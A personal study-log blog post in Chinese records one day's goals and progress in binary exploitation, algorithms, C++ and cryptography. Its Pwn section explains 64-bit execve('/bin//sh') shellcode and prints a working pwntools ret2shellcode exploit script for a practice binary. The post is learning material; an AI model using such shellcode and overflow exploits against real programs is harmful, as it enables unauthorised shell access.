9-6学习打卡(6.14)

昨天休息了一天(感觉是好久没休息了),打了一下午狼人杀剧本杀、打麻将,好快乐,不过一日不学果然心慌慌,不过我感觉学习模式该调整一下,每天起来得先写好list,要不然效率不够高。

6.14 to do list:

1.每日Pwn学习

2.级数复习 to 数据结构小章 and 算法小章

3.Cpp第一章

4.密码工程练习(附加)

 

一:每日Pwn学习

64位调用shellcode

9-6学习打卡(6.14)

64位shellcode流程

9-6学习打卡(6.14)

几个需要注意的细节:

1.rax是调用3b

2.rdi传参细节,首先xor清零,第二压入堆栈,第三讲/bin//sh赋值到rdi,再压入堆栈,最后将rsp地址给rdi

现在栈的数据是0x2f62696e2f73680,小端存储第一步和第二步的目的是最后的值0截断,以防后面的数据连续读

3.syscall

gcc输出64位文件记得 要在-o 前打-m64或则不打

9-6学习打卡(6.14)

一个是gets要获取的地址,一个是puts要获取的地址

64位的程序会返回一个8字节的地址,peda是可以直接查询偏移的

9-6学习打卡(6.14)

但pwndbg是不行是,正确的返回地址是后四个字节(因为小端存储)

9-6学习打卡(6.14)

这样查即可

思路就是第一个gets覆盖返回地址到buf2,第二个gets存入buf2的shellcode

exp.py(才发现直接复制过来会出事,那只能上传无注释版的了)

from pwn import *

context(arch = "amd64" , os = "linux")

#context.log_level = "debug"

p = process("./ret2shellcode_64")

offset = 40

e = ELF("./ret2shellcode_64")

buf2 = e.symbols["buf2"]

shellcode = asm(shellcraft.sh())

payload1 = offset * "P" + p64(buf2)

payload2 = shellcode.ljust(200,'Z')

p.recvuntil(": ")

p.sendline(payload1)

p.recvuntil(": ")

p.sendline(payload2)

print buf2

p.interactive()

 

二:级数复习

级数已复习,完成算法导论第二章,好有意思,准备再看一遍结尾,本来想着看个小章,由于数据结构另一个在看,于是看完这一章(虽然不长),但今天数据结构没法打卡了。

 

三:CPP

看到了本书约定,又又又又看了次C的历程,真是每次看每次感觉不一样。

 

四:密码工程

这个附加项今天没精力完成了,GOOD NIGHT.

上一篇:Stack Canary


下一篇:linux使用crontab -e 遇到No space left on device